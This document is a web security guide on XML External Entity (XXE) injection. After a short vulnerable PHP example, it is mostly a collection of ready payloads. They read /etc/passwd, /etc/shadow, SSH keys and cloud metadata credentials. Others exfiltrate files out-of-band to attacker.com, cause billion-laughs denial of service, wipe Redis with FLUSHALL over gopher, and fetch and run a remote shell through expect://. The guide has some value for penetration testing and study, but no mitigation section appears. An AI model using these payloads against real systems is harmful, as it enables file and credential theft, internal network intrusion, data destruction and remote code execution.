XML injection (XXE - XML External Entity)
What is XXE Injection?
XML External Entity (XXE) injection is a vulnerability that occurs when an XML parser processes external entity references in XML documents without proper validation. This allows attackers to access local files, perform SSRF attacks, cause denial of service, or execute remote code in some cases.
Vulnerable Code Example
// PHP vulnerable XML processing
$xml_data = $_POST['xml'];
// Vulnerable: libxml with external entities enabled
$dom = new DOMDocument();
$dom->loadXML($xml_data);
// External entities processed by default
$xpath = new DOMXPath($dom);
$result = $xpath->query('//user/name');
echo "User: " . $result->item(0)->nodeValue;Normal XML Request:
<?xml version="1.0"?>
<user>
<name>John</name>
<email>john@example.com</email>
</user>Malicious XXE Request:
<?xml version="1.0"?>
<!DOCTYPE user [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<user>
<name>&xxe;</name>
<email>john@example.com</email>
</user>How XXE Injection Works
XXE exploits the XML parser's ability to process Document Type Definitions (DTDs) and external entities. When external entity processing is enabled, attackers can define malicious entities that reference local files, network resources, or other XML documents.
XML Entity Types
Internal Entities:
<!DOCTYPE doc [
<!ENTITY internal "Internal Entity Value">
]>
<doc>&internal;</doc>External Entities:
<!DOCTYPE doc [
<!ENTITY external SYSTEM "file:///etc/passwd">
]>
<doc>&external;</doc>Parameter Entities:
<!DOCTYPE doc [
<!ENTITY % param "value">
%param;
]>General vs Parameter Entities:
General entities:
&entityname;- Used in document contentParameter entities:
%entityname;- Used in DTD definitions
Impact and Consequences
Local File Disclosure - Reading sensitive system files
Server-Side Request Forgery (SSRF) - Making requests to internal services
Denial of Service - Billion laughs attack, recursive entity expansion
Remote Code Execution - In specific configurations (expect://, PHP wrappers)
Information Disclosure - Extracting configuration files, source code
Port Scanning - Discovering internal network services
XML Parser Behavior and Detection
Common XML Parsers
PHP Parsers:
DOMDocument- Default: External entities enabledSimpleXML- Default: External entities disabled (PHP 5.6+)XMLReader- Default: External entities enabled
Java Parsers:
DocumentBuilderFactory- Default: External entities enabledSAXParserFactory- Default: External entities enabledXMLInputFactory(StAX) - Default: External entities enabledTransformerFactory- Default: External entities enabled
Python Parsers:
xml.etree.ElementTree- Default: External entities disabledxml.dom.minidom- Default: External entities disabledlxml- Default: External entities disabledxml.sax- Default: External entities disabled
JavaScript/Node.js Parsers:
libxmljs- Default: External entities enabledxmldom- Default: External entities enabledxml2js- Default: External entities disabled
Detection Methodology
Basic Entity Detection:
<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY test "XXE_DETECTED">
]>
<root>
<data>&test;</data>
</root>File Reading Detection:
<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY xxe SYSTEM "file:///etc/hostname">
]>
<root>
<data>&xxe;</data>
</root>HTTP Request Detection:
<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY xxe SYSTEM "http://attacker.com/xxe_test">
]>
<root>
<data>&xxe;</data>
</root>Basic XXE Exploitation Techniques
Local File Disclosure
Direct File Reading
Reading System Files:
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY file SYSTEM "file:///etc/passwd">
]>
<data>
<content>&file;</content>
</data>Reading Configuration Files:
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY config SYSTEM "file:///etc/apache2/apache2.conf">
]>
<data>
<content>&config;</content>
</data>Reading Application Files:
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY app SYSTEM "file:///var/www/html/config.php">
]>
<data>
<content>&app;</content>
</data>Windows File System Access
Reading Windows System Files:
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY file SYSTEM "file:///C:/Windows/System32/drivers/etc/hosts">
]>
<data>
<content>&file;</content>
</data>Reading IIS Configuration:
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY iis SYSTEM "file:///C:/inetpub/wwwroot/web.config">
]>
<data>
<content>&iis;</content>
</data>Reading Application Data:
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY app SYSTEM "file:///C:/Program Files/Application/config.xml">
]>
<data>
<content>&app;</content>
</data>Environment-Specific Paths
Common Linux Paths:
<!-- System Information -->
<!ENTITY system SYSTEM "file:///proc/version">
<!ENTITY cpuinfo SYSTEM "file:///proc/cpuinfo">
<!ENTITY meminfo SYSTEM "file:///proc/meminfo">
<!-- Network Configuration -->
<!ENTITY hosts SYSTEM "file:///etc/hosts">
<!ENTITY resolv SYSTEM "file:///etc/resolv.conf">
<!ENTITY network SYSTEM "file:///etc/network/interfaces">
<!-- User Information -->
<!ENTITY passwd SYSTEM "file:///etc/passwd">
<!ENTITY shadow SYSTEM "file:///etc/shadow">
<!ENTITY group SYSTEM "file:///etc/group">
<!-- SSH Configuration -->
<!ENTITY sshd_config SYSTEM "file:///etc/ssh/sshd_config">
<!ENTITY ssh_host_key SYSTEM "file:///etc/ssh/ssh_host_rsa_key">
<!-- Log Files -->
<!ENTITY auth_log SYSTEM "file:///var/log/auth.log">
<!ENTITY syslog SYSTEM "file:///var/log/syslog">
<!ENTITY apache_log SYSTEM "file:///var/log/apache2/access.log">Common Windows Paths:
<!-- System Information -->
<!ENTITY boot SYSTEM "file:///C:/boot.ini">
<!ENTITY hosts SYSTEM "file:///C:/Windows/System32/drivers/etc/hosts">
<!-- IIS Configuration -->
<!ENTITY iis_config SYSTEM "file:///C:/inetpub/wwwroot/web.config">
<!ENTITY machine_config SYSTEM "file:///C:/Windows/Microsoft.NET/Framework64/v4.0.30319/Config/machine.config">
<!-- Application Files -->
<!ENTITY app_config SYSTEM "file:///C:/inetpub/wwwroot/App_Data/database.config">
<!ENTITY connection_strings SYSTEM "file:///C:/inetpub/wwwroot/connectionStrings.config">
<!-- User Profiles -->
<!ENTITY user_profile SYSTEM "file:///C:/Users/Administrator/Desktop/passwords.txt">
<!ENTITY documents SYSTEM "file:///C:/Users/Administrator/Documents/sensitive.doc">Server-Side Request Forgery (SSRF)
Internal Network Scanning
Port Scanning:
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY ssrf SYSTEM "http://192.168.1.1:80/">
]>
<data>
<content>&ssrf;</content>
</data>Service Discovery:
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY mysql SYSTEM "http://localhost:3306/">
<!ENTITY redis SYSTEM "http://localhost:6379/">
<!ENTITY mongo SYSTEM "http://localhost:27017/">
<!ENTITY elastic SYSTEM "http://localhost:9200/">
]>
<data>
<mysql>&mysql;</mysql>
<redis>&redis;</redis>
<mongo>&mongo;</mongo>
<elastic>&elastic;</elastic>
</data>Internal API Access:
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY api SYSTEM "http://internal-api.company.com/admin/users">
]>
<data>
<content>&api;</content>
</data>Cloud Metadata Access
AWS Metadata Service:
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY aws SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
]>
<data>
<content>&aws;</content>
</data>Google Cloud Metadata:
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY gcp SYSTEM "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token">
]>
<data>
<content>&gcp;</content>
</data>Azure Metadata Service:
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY azure SYSTEM "http://169.254.169.254/metadata/instance/compute/azEnvironment?api-version=2021-02-01">
]>
<data>
<content>&azure;</content>
</data>Protocol Exploitation
FTP Protocol:
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY ftp SYSTEM "ftp://internal-ftp.company.com:21/">
]>
<data>
<content>&ftp;</content>
</data>LDAP Protocol:
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY ldap SYSTEM "ldap://internal-ldap.company.com:389/dc=company,dc=com">
]>
<data>
<content>&ldap;</content>
</data>Gopher Protocol (if supported):
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY gopher SYSTEM "gopher://localhost:6379/_*1%0d%0a$4%0d%0ainfo%0d%0a">
]>
<data>
<content>&gopher;</content>
</data>Advanced XXE Exploitation
Blind XXE Exploitation
Out-of-Band Data Exfiltration
Basic Out-of-Band XXE:
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % exfiltrate SYSTEM 'http://attacker.com/collect.php?data=%file;'>">
%eval;
%exfiltrate;
]>
<data>test</data>Parameter Entity Chaining:
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY % remote SYSTEM "http://attacker.com/evil.dtd">
%remote;
]>
<data>test</data>External DTD (evil.dtd on attacker server):
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % exfiltrate SYSTEM 'http://attacker.com/collect.php?data=%file;'>">
%eval;
%exfiltrate;Error-Based Blind XXE
XML Parse Error Exploitation:
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
]>
<data>test</data>Invalid URI Error:
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY % error SYSTEM 'http://nonexistent.%file;.attacker.com/'>">
%eval;
%error;
]>
<data>test</data>Time-Based Blind XXE
Slow External Resource:
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY slow SYSTEM "http://slow-server.attacker.com/delay.php?time=10">
]>
<data>&slow;</data>Conditional Time Delays:
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY % condition SYSTEM "file:///etc/passwd">
<!ENTITY % delay "<!ENTITY % slow SYSTEM 'http://attacker.com/slow.php?exists=%condition;'>">
%delay;
%slow;
]>
<data>test</data>XXE with Parameter Entities
Complex Parameter Entity Attacks
Nested Parameter Entities:
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY % param1 "<!ENTITY % param2 '<!ENTITY &#x25; param3 SYSTEM "file:///etc/passwd">'>">
%param1;
%param2;
%param3;
]>
<data>¶m3;</data>Parameter Entity with External DTD:
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY % external SYSTEM "http://attacker.com/external.dtd">
%external;
%all;
]>
<data>&send;</data>External DTD with Data Exfiltration:
<!-- external.dtd -->
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://attacker.com/collect.php?data=%file;'>">UTF-16 Encoding Bypass
UTF-16BE Encoded XXE:
<?xml version="1.0" encoding="UTF-16BE"?>
<!DOCTYPE data [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data>&xxe;</data>UTF-16LE Encoded XXE:
<?xml version="1.0" encoding="UTF-16LE"?>
<!DOCTYPE data [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data>&xxe;</data>Protocol Handler Exploitation
PHP Wrapper Exploitation
PHP Filter for Base64 Encoding:
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
]>
<data>&file;</data>PHP Input Stream:
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY input SYSTEM "php://input">
]>
<data>&input;</data>PHP Expect Wrapper (if enabled):
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY cmd SYSTEM "expect://whoami">
]>
<data>&cmd;</data>Data URI Exploitation
Data URI with Base64:
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY b64 SYSTEM "data:text/plain;base64,SGVsbG8gV29ybGQ=">
]>
<data>&b64;</data>Data URI with URL Encoding:
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY encoded SYSTEM "data:text/plain,Hello%20World">
]>
<data>&encoded;</data>Java-Specific Protocol Handlers
jar:// Protocol:
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY jar SYSTEM "jar:file:///path/to/archive.jar!/META-INF/MANIFEST.MF">
]>
<data>&jar;</data>netdoc:// Protocol (Java):
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY netdoc SYSTEM "netdoc:///etc/passwd">
]>
<data>&netdoc;</data>Denial of Service Attacks
Billion Laughs Attack
Exponential Entity Expansion
Classic Billion Laughs:
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<data>&lol9;</data>Optimized Expansion Attack:
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY a "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa">
<!ENTITY b "&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;">
<!ENTITY c "&b;&b;&b;&b;&b;&b;&b;&b;&b;&b;">
<!ENTITY d "&c;&c;&c;&c;&c;&c;&c;&c;&c;&c;">
<!ENTITY e "&d;&d;&d;&d;&d;&d;&d;&d;&d;&d;">
]>
<data>&e;</data>Quadratic Blowup Attack
Large Entity Repetition: The quadratic blowup attack involves creating a very large entity (thousands of characters) and then referencing it multiple times within the XML document. This causes exponential memory consumption as the parser expands each reference. Create an entity with 10,000+ repetitive characters, then reference it 1,000+ times in the document content.
xml
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY huge "AAAA[...repeat A 10,000 times...]AAAA">
]>
<data>
&huge;&huge;&huge;[...repeat &huge; 1000+ times...]&huge;
</data>External Resource Exhaustion
Slow Loris Attack
Slow External Resource Loading:
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY slow1 SYSTEM "http://slow-server.attacker.com/delay?time=30">
<!ENTITY slow2 SYSTEM "http://slow-server.attacker.com/delay?time=30">
<!ENTITY slow3 SYSTEM "http://slow-server.attacker.com/delay?time=30">
]>
<data>
&slow1;&slow2;&slow3;
</data>Multiple Concurrent Requests:
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY req1 SYSTEM "http://target-internal.com/large-resource">
<!ENTITY req2 SYSTEM "http://target-internal.com/large-resource">
<!ENTITY req3 SYSTEM "http://target-internal.com/large-resource">
<!ENTITY req4 SYSTEM "http://target-internal.com/large-resource">
<!ENTITY req5 SYSTEM "http://target-internal.com/large-resource">
]>
<data>
&req1;&req2;&req3;&req4;&req5;
</data>Recursive Entity Loading
Infinite External Entity Loop:
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY % recursive SYSTEM "http://attacker.com/recursive.dtd">
%recursive;
]>
<data>test</data>Recursive DTD (recursive.dtd):
<!ENTITY % recursive SYSTEM "http://attacker.com/recursive.dtd">
%recursive;XXE in Different Application Contexts
Web Services and APIs
SOAP Web Services
SOAP Envelope XXE:
<?xml version="1.0"?>
<!DOCTYPE soap:Envelope [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<getUserInfo>
<username>&xxe;</username>
</getUserInfo>
</soap:Body>
</soap:Envelope>WSDL File XXE:
<?xml version="1.0"?>
<!DOCTYPE definitions [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<definitions xmlns="http://schemas.xmlsoap.org/wsdl/">
<documentation>&xxe;</documentation>
</definitions>REST API with XML Content
XML Payload in REST:
POST /api/users HTTP/1.1
Content-Type: application/xml
<?xml version="1.0"?>
<!DOCTYPE user [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<user>
<name>&xxe;</name>
<email>test@example.com</email>
</user>RSS Feed Processing:
<?xml version="1.0"?>
<!DOCTYPE rss [
<!ENTITY xxe SYSTEM "file:///var/www/html/config.php">
]>
<rss version="2.0">
<channel>
<title>News Feed</title>
<description>&xxe;</description>
</channel>
</rss>File Upload and Processing
Document Upload XXE
Microsoft Office Document XXE:
<!-- In document.xml within .docx file -->
<?xml version="1.0"?>
<!DOCTYPE document [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
<w:body>
<w:p>
<w:r>
<w:t>&xxe;</w:t>
</w:r>
</w:p>
</w:body>
</w:document>SVG File XXE:
<?xml version="1.0"?>
<!DOCTYPE svg [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<svg xmlns="http://www.w3.org/2000/svg">
<text>&xxe;</text>
</svg>Android APK Manifest XXE:
<?xml version="1.0"?>
<!DOCTYPE manifest [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<manifest xmlns:android="http://schemas.android.com/apk/res/android">
<application android:label="&xxe;">
</application>
</manifest>Configuration File Processing
XML Configuration Files:
<?xml version="1.0"?>
<!DOCTYPE config [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<config>
<database>
<host>&xxe;</host>
<username>admin</username>
</database>
</config>Spring Bean Configuration:
<?xml version="1.0"?>
<!DOCTYPE beans [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<beans xmlns="http://www.springframework.org/schema/beans">
<bean id="dataSource" class="org.apache.commons.dbcp.BasicDataSource">
<property name="url" value="&xxe;"/>
</bean>
</beans>Content Management Systems
WordPress XML-RPC
XML-RPC Method Call:
<?xml version="1.0"?>
<!DOCTYPE methodCall [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<methodCall>
<methodName>system.listMethods</methodName>
<params>
<param>
<value>
<string>&xxe;</string>
</value>
</param>
</params>
</methodCall>Drupal XML Processing
Drupal Feed Import:
<?xml version="1.0"?>
<!DOCTYPE rdf:RDF [
<!ENTITY xxe SYSTEM "file:///var/www/drupal/sites/default/settings.php">
]>
<rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<item>
<title>&xxe;</title>
</item>
</rdf:RDF>XXE in Mobile Applications
Android Application XXE
XML Parsing in Android
Android XML Parser XXE:
<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "file:///system/etc/hosts">
]>
<root>
<data>&xxe;</data>
</root>Android Layout XML:
<?xml version="1.0"?>
<!DOCTYPE LinearLayout [
<!ENTITY xxe SYSTEM "file:///data/data/com.app.package/shared_prefs/preferences.xml">
]>
<LinearLayout xmlns:android="http://schemas.android.com/apk/res/android">
<TextView android:text="&xxe;" />
</LinearLayout>iOS Application XXE
iOS Plist Processing:
<?xml version="1.0"?>
<!DOCTYPE plist [
<!ENTITY xxe SYSTEM "file:///private/var/mobile/Library/Preferences/com.app.plist">
]>
<plist version="1.0">
<dict>
<key>data</key>
<string>&xxe;</string>
</dict>
</plist>Advanced Exploitation Scenarios
Multi-Stage XXE Attacks
XXE to RCE Chain
Stage 1: File Discovery
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY file SYSTEM "file:///etc/crontab">
]>
<data>&file;</data>Stage 2: Configuration Extraction
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY config SYSTEM "file:///var/www/html/config.php">
]>
<data>&config;</data>Stage 3: Remote Code Execution (if PHP expect enabled)
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY rce SYSTEM "expect://curl http://attacker.com/shell.php | php">
]>
<data>&rce;</data>XXE to SSRF to Internal Network Compromise
Stage 1: Internal Network Discovery
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY scan SYSTEM "http://192.168.1.1:22/">
]>
<data>&scan;</data>Stage 2: Service Enumeration
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY redis SYSTEM "http://192.168.1.100:6379/">
]>
<data>&redis;</data>Stage 3: Service Exploitation via Gopher
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY exploit SYSTEM "gopher://192.168.1.100:6379/_*1%0d%0a$8%0d%0aFLUSHALL%0d%0a">
]>
<data>&exploit;</data>Last updated
Was this helpful?